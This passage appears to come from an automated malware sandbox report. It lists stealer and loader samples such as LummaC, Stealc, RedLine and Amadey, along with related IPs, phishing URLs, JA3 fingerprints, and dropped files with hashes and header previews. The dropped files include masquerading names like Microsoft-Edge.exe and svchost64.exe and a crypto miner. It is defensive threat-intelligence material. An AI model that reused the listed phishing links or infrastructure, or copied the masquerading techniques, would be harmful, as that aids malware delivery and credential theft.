                                                                                                                                                          • 172.65.208.22
                                                                                                                                                          ATT71817.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          FoS5cjKhd3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.4.136
                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                          • 172.67.162.108
                                                                                                                                                          https://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fcasaderestauraciononline.com%2Fholy%2Findexsyn1.html%23cmltYS5hbWV1ckBjYXRhbGluYW1hcmtldGluZy5mcg==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          https://changeofscene.ladesk.com/605425-Secure-Business-DocumenGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.17.24.14
                                                                                                                                                          https://careeligibility.vercel.app/chubedanGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 172.67.75.166
                                                                                                                                                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                                                                                                          • 185.215.113.37
                                                                                                                                                          kYpONUhAR5.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                          • 185.215.113.67
                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                          • 185.215.113.103
                                                                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                          • 185.215.113.37
                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                          • 185.215.113.37
                                                                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                          • 185.215.113.37
                                                                                                                                                          file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                          • 185.215.113.16
                                                                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                          • 185.215.113.37
                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                          • 185.215.113.37
                                                                                                                                                          file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                          • 185.215.113.16

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          74954a0c86284d0d6e1c4efefe92b521file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          Setup_10024.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          ha9wYxkNI7.lnkGet hashmaliciousXWormBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          9KO1ScZ376.lnkGet hashmaliciousXWormBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          U4hM4c3l4m.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          f1w58Se3jL.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          6EFA6YABDc.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          1ehTzqaTXV.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          Document.pdf.lnkGet hashmaliciousBitter ElephantBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Trojan.PackedNET.3065.20099.26130.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 140.82.121.3
                                                                                                                                                          https://effective-teammates-567500.framer.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 140.82.121.3
                                                                                                                                                          https://main.d3engbxc9elyir.amplifyapp.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 140.82.121.3
                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                          • 140.82.121.3
                                                                                                                                                          Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 140.82.121.3
                                                                                                                                                          PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 140.82.121.3
                                                                                                                                                          http://polskie-torrenty.eu/redir.php?url=https://globalfinanceweb.com%2FProfile%2Fluig%2Fnzx0k%2FmProtect.html%23abrumley@highlandfunds.comGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 140.82.121.3
                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 140.82.121.3
                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 140.82.121.3
                                                                                                                                                          rQuotation3200025006.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 140.82.121.3
                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1FoS5cjKhd3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          bfINGx7hvL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          kewyIO69TI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          bfINGx7hvL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          gZzI6gTYn4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          U6b3tLFqN5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          FACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.187.100
                                                                                                                                                          Dev_Project.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.187.100

                                                                                                                                                          Dropped Files

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exefile.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exefile.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exefile.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\miner2.0.exe.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\miner2.0.exe
                                                                                                                                                                File Type:CSV text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):226
                                                                                                                                                                Entropy (8bit):5.355760272568367
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2FDkwIyp1v:Q3La/KDLI4MWuPXcp1v
                                                                                                                                                                MD5:FC3575D5BE1A5405683DC33B66D36243
                                                                                                                                                                SHA1:1C816D34B7D5B96E077DC3EF640BA8C7BA370502
                                                                                                                                                                SHA-256:1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
                                                                                                                                                                SHA-512:68914FE00F8550A623074F9ACC31ACEF8A3F6DFDDBD9FDA23512079BEC5E8A4D4E82BC8CD8D536E6C88F4DA3A704AC376785B44343BD3BED83E440857A3C0164
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services64.exe.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\services64.exe
                                                                                                                                                                File Type:CSV text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):226
                                                                                                                                                                Entropy (8bit):5.355760272568367
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2FDkwIyp1v:Q3La/KDLI4MWuPXcp1v
                                                                                                                                                                MD5:FC3575D5BE1A5405683DC33B66D36243
                                                                                                                                                                SHA1:1C816D34B7D5B96E077DC3EF640BA8C7BA370502
                                                                                                                                                                SHA-256:1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
                                                                                                                                                                SHA-512:68914FE00F8550A623074F9ACC31ACEF8A3F6DFDDBD9FDA23512079BEC5E8A4D4E82BC8CD8D536E6C88F4DA3A704AC376785B44343BD3BED83E440857A3C0164
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost64.exe.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\Microsoft\Libs\sihost64.exe
                                                                                                                                                                File Type:CSV text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):443
                                                                                                                                                                Entropy (8bit):5.347274615985407
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZav:ML9E4KQMsXE4Npv
                                                                                                                                                                MD5:F73EF0CF34F9748349B7DC26D23369A1
                                                                                                                                                                SHA1:9F1AA6A1896EE82B13E910AFF27CB179ECAA77B5
                                                                                                                                                                SHA-256:6B8272C1059743AA45FBEB2E303FEFB6F591D3D374FB78252432881E38E21EFD
                                                                                                                                                                SHA-512:C848DEE56D1BB8ABED56C0424879344F852BFA5147D529183A66C98BC303C225DCF5D7ADCF6B25B4946D0ED14023E0B5DB7D2A2C2789727949478DE64A4BAA13
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\svchost64.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):646
                                                                                                                                                                Entropy (8bit):5.350532275588425
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZaDAWDLI4MWuCDAZDLI4MWuCv:ML9E4KQMsXE4Np/E4K9E4Ks
                                                                                                                                                                MD5:D9CA89A021349720070D9515234EA98F
                                                                                                                                                                SHA1:6250FA94AB1D87D655C60185FACC639EE1E0B929
                                                                                                                                                                SHA-256:08757D7C558DCA49E7A21644675009292CBA4DF6624FB85B6DF0E90E7198D6A4
                                                                                                                                                                SHA-512:5419EACD79DF0BAA7A3CEB5FCC4AA85FC882081C2B6793219F296B9649FE5BC6884FD6F64199FB7C411443DA1D44C79CD129B9AB1CBA22E656A5C91DF92F0F05
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):435820
                                                                                                                                                                Entropy (8bit):5.87360608417321
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:xUqYwuIRcCdb4vngCuoyGIlAkAzQXIwWNQBUh7g600NifMohIUiaBQv2kzmOWw:xUXCio4yLC1k5Gq0o0a8FrWw
                                                                                                                                                                MD5:7DF3608AE8EA69762C71DA1C05F0C043
                                                                                                                                                                SHA1:164A36D4822BE3FD4111CDEF5CECAD5F19024564
                                                                                                                                                                SHA-256:ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
                                                                                                                                                                SHA-512:E1AF2E687457B9866FD059D0E6AA50054456CDCC0E7FAE1CC4DA7E44312CD5663C38C13999A08E5585077176279CD83B8B6AEF93AA6FE68AD74A5FAADE5295CE
                                                                                                                                                                Malicious:true
                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........'......6....................@.....................................l.....`... ..........................................................E......x...........................................@h..(.......................`............................text...X5.......6..................`.P`.data........P.......<..............@.P..rdata.......`.......>..............@.`@.pdata..x............P..............@.0@.xdata...............T..............@.0@.bss..................................`..idata...............X..............@.0..CRT....h............j..............@.@..tls.................l..............@.@..rsrc....E.......F...n..............@.0./4...........@......................@..B/19..........P......................@..B/31......).......*...J..............@..B/45......(.......*...t..............@..B/57..........@......................@.@B/70.....

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):64
                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:@...e...........................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):435820
                                                                                                                                                                Entropy (8bit):5.87360608417321
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:xUqYwuIRcCdb4vngCuoyGIlAkAzQXIwWNQBUh7g600NifMohIUiaBQv2kzmOWw:xUXCio4yLC1k5Gq0o0a8FrWw
                                                                                                                                                                MD5:7DF3608AE8EA69762C71DA1C05F0C043
                                                                                                                                                                SHA1:164A36D4822BE3FD4111CDEF5CECAD5F19024564
                                                                                                                                                                SHA-256:ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
                                                                                                                                                                SHA-512:E1AF2E687457B9866FD059D0E6AA50054456CDCC0E7FAE1CC4DA7E44312CD5663C38C13999A08E5585077176279CD83B8B6AEF93AA6FE68AD74A5FAADE5295CE
                                                                                                                                                                Malicious:true
                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........'......6....................@.....................................l.....`... ..........................................................E......x...........................................@h..(.......................`............................text...X5.......6..................`.P`.data........P.......<..............@.P..rdata.......`.......>..............@.`@.pdata..x............P..............@.0@.xdata...............T..............@.0@.bss..................................`..idata...............X..............@.0..CRT....h............j..............@.@..tls.................l..............@.@..rsrc....E.......F...n..............@.0./4...........@......................@..B/19..........P......................@..B/31......).......*...J..............@..B/45......(.......*...t..............@..B/57..........@......................@.@B/70.....

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1862656
                                                                                                                                                                Entropy (8bit):7.950142025223752
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:Rf036dyCkdyKg1Il+5elMr8JYPDaLObL:R06dyR9oIlFlMr5V
                                                                                                                                                                MD5:DC730EEA0EBA910485703A74D173F8E2
                                                                                                                                                                SHA1:093F63548D7366B6C3CBFC3DDFCA453199E40ECA
                                                                                                                                                                SHA-256:18894A1A879E0E75C33EC7988C8835B20B42A3FAE8C51F1CB4F026F2B855A6B7
                                                                                                                                                                SHA-512:F1726FAE08F206B07AC87ECF890059E98B110A1DB0C72ADD91B89EBBBB5E8D431AACFE31C37028DB3CF52EEFB7A6BDFC137122B82C7B10DD87E6800A641F933D
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................J...........@..........................@J..........@.................................W...k.............................I...............................I..................................................... . ............................@....rsrc...............................@....idata ............................@... ..).........................@...nataabbx.`....0..R..................@...ijueevze......J......F..............@....taggant.0....J.."...J..............@...........................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):26
                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):435820
                                                                                                                                                                Entropy (8bit):5.87360608417321
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:xUqYwuIRcCdb4vngCuoyGIlAkAzQXIwWNQBUh7g600NifMohIUiaBQv2kzmOWw:xUXCio4yLC1k5Gq0o0a8FrWw
                                                                                                                                                                MD5:7DF3608AE8EA69762C71DA1C05F0C043
                                                                                                                                                                SHA1:164A36D4822BE3FD4111CDEF5CECAD5F19024564
                                                                                                                                                                SHA-256:ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
                                                                                                                                                                SHA-512:E1AF2E687457B9866FD059D0E6AA50054456CDCC0E7FAE1CC4DA7E44312CD5663C38C13999A08E5585077176279CD83B8B6AEF93AA6FE68AD74A5FAADE5295CE
                                                                                                                                                                Malicious:true
                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........'......6....................@.....................................l.....`... ..........................................................E......x...........................................@h..(.......................`............................text...X5.......6..................`.P`.data........P.......<..............@.P..rdata.......`.......>..............@.`@.pdata..x............P..............@.0@.xdata...............T..............@.0@.bss..................................`..idata...............X..............@.0..CRT....h............j..............@.@..tls.................l..............@.@..rsrc....E.......F...n..............@.0./4...........@......................@..B/19..........P......................@..B/31......).......*...J..............@..B/45......(.......*...t..............@..B/57..........@......................@.@B/70.....

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02hfu414.g3e.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jx2i0vc.koj.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1lquwdk3.nnf.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1sw33nuf.jy0.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gsrsrja.otm.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2um1ksua.x0s.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
